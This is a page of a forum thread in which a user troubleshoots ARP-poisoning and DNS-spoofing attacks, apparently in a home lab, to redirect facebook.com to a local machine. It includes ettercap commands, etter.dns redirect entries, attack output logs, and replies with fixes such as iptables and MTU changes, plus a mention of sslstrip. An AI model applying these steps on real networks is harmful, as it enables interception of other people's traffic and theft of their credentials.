Page 1 of 2 12 LastLast
Results 1 to 10 of 13

Thread: DNS spoofing failing

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    10

    Default DNS spoofing failing

    This is going to be my first post here but ive looked for the answer and found nothing.

    My enviroment is as follows:
    Target box, macbook pro running snow leopard.(192.168.1.78)
    Attacker Acer apire one running BT 5r3 with wireless network addapter (192.168.1.64).
    both inside local network with 2wire router (192.168.1.254).

    Im trying to do dns spoofing to redirect dns request (facebook) from target to local ip (192.168.1.64)

    In my first attempts i used ettercap, y edited the etter.dns file as follows "*.facebook.com A 192.168.1.64" and then i run the command "ettercap -Tqi wlan1 -P dns_spoof -M arp /192.168.1.78/ /192.168.1.254/"
    After that the verified that the man in the middle attack was working correctly as i could capture traffic between the target and the router.
    However the dns spoof didnt work, target could enter facebook without trouble.

    I rebooted the attacker computer with the native win7 and runned cain & abel. Started the sniffer, selected the target, modified the arp-dns, poisoned, and even though i got full routing the spoofing continued failing.

    I switched machines making the apire one the target and booted my macbook with BT 5r3 live CD. did the same procedure and failed.

    I seem to be unable to the the dns spoofing and i want to know why

    So my question would be: What im i missing? What changes do i need to perform? do i need to modify my network settings?

    Thank you all for your help.
    I searched the forum for answer and even though there are several treads on this topic none addressed my problem as i seem to fail no matter what program (ettercap, c&a, dnsspoof, etc) i run.

  2. #2
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default Re: DNS spoofing failing

    Hi The router has probable cached the address and can server it up quicker than the attackers replies. You will have to wait 20mins approx without going to the site, or try some random url in ettercap before going to the site.

  3. #3
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    10

    Default Re: DNS spoofing failing

    I see, so the attacker would have to be quicker than the router? or is there other way? How can i corroborate that?
    Ill try your suggestion and replay!
    Thanks!

  4. #4
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    10

    Default Re: DNS spoofing failing

    Hey! thanks for the advise however it still doesnt work, although i got more info.
    I modified the etter.dns like "* A 192.168.1.74" so as to redirect all requests to my attacker, not all pages worked however i typed a random site (blop.com) and it got redirected strangly i did it again (akash.com) and said that it couldnt find the host.
    I tried spoofing other sites like wikipedia, grooveshark, gmail, hotmail and other popular websites without luck.

    Could i reconfigure the router so it allows the attack?

    Thanks!

  5. #5
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    10

    Default Re: DNS spoofing failing

    Sorry for multiple replys but im experimenting.

    So i used ethernet with my attacker and got more results.
    I also changed the etter.dns to say this:
    facebook.com A 192.168.1.77
    *.facebook.com A 192.168.1.77
    www.facebook.com PTR 192.168.1.77

    And the command in ettercap to redirect the traffic from all my network:
    'ettercap -Tqi eth0 -P dns_spoof -M arp // /192.168.1.254/'


    After that i got this errors, (although it says is spoofing my targets see no changes to their requests, they go to the real site):
    dns_spoof: [es-la.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [fr-fr.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [pt-br.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [de-de.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [it-it.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [ar-ar.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [hi-in.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [zh-cn.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [ja-jp.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [developers.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [zh-cn.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [ja-jp.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [developers.facebook.com] spoofed to [192.168.1.77]
    DHCP: [192.168.1.254] OFFER : 192.168.1.77 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254
    dns_spoof: [zh-cn.facebook.com] spoofed to [192.168.1.77]
    SEND L3 ERROR: 1591 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
    )
    SEND L3 ERROR: 1525 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
    )
    SEND L3 ERROR: 1525 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
    )
    SEND L3 ERROR: 1525 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
    )
    dns_spoof: [ja-jp.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [developers.facebook.com] spoofed to [192.168.1.77]
    DHCP: [192.168.1.254] ACK : 192.168.1.77 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "gateway.2wire.net"
    dns_spoof: [ja-jp.facebook.com] spoofed to [192.168.1.77]
    DHCP: [192.168.1.254] ACK : 192.168.1.77 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "gateway.2wire.net"
    dns_spoof: [developers.facebook.com] spoofed to [192.168.1.77]
    SEND L3 ERROR: 2932 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
    )
    SEND L3 ERROR: 1593 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
    )

  6. #6
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default Re: DNS spoofing failing

    You could try dropping packets from the router "iptables -A INPUT -p udp --srcport 53 -src 192.168.1.1 -j DROP", to see if its repliing first.

  7. #7
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    4

    Default Re: DNS spoofing failing

    I had a similar issue with what you were experiencing with ettercap and dns spoof.. this is what I did in my etter.dns to fix it:


    facebook.com A attacker.ip.here
    *.facebook.com A attacker.ip.here
    www.facebook.com PTR attacker.ip.here

    After that, it worked like a charm - not sure if yours was the same issue, but it worked for me.

    Also - for me I found out that (which is not your case) using VirtualBox to Regular PC broke it for me as well.. The attack would however work from PC to PC and sometimes from VM (VBOX) to VM (VBOX)

    Hope that helps!

    -DV

  8. #8
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    10

    Default Re: DNS spoofing failing

    Quote Originally Posted by DigitalV View Post

    facebook.com A attacker.ip.here
    *.facebook.com A attacker.ip.here
    www.facebook.com PTR attacker.ip.here

    -DV
    Thank you for the tip, however that is exactly what i did, i havent managed to make it work yet, however i belive i has something to do with my pc specs... i tried also modifying the etter.conf to run it like root and use ip tables.

    i realy dont understand where is the problem...

    I did however foundout that while facebook.com doesnt get redirected developers.facebook.com does. My account runs with https (ssl) so perhaps there is a way to use sslstrip with ettercap together...
    although i dont know how to do that...
    Other thing is that changing the spoofed site to www.bopibloop.com which actually doesnt exists still doesnt get redirected...

    Ill keep reserching and post a solotion if i find one.

  9. #9
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default Re: DNS spoofing failing

    Hi Ditto
    with this, can you try ifconfig eth0 mtu 1700 up
    "SEND L3 ERROR: 1525 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
    )"

  10. #10
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    10

    Default Re: DNS spoofing failing

    Hey! sorry for the delay in answering...
    There has been no progress but im inclined to belive this is has to do with the modem.
    Ill try other methods for dns spoof
    Ill write back when i figure it out, however i would apreciate suggestions

Page 1 of 2 12 LastLast

Similar Threads

  1. DNS Spoofing via Ettercap failing
    By blackhawk2292 in forum BackTrack 5 Beginners Section
    Replies: 12
    Last Post: 10-02-2011, 10:19 PM
  2. Startx failing
    By Bukva in forum BackTrack 5 Beginners Section
    Replies: 11
    Last Post: 05-13-2011, 04:27 AM
  3. Booting keeps failing. Help me?
    By UnknownError in forum Beginners Forum
    Replies: 4
    Last Post: 01-17-2010, 07:51 AM
  4. Ettercap DNS Spoofing Not.. Spoofing
    By oxide in forum OLD Newbie Area
    Replies: 4
    Last Post: 04-02-2009, 10:39 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •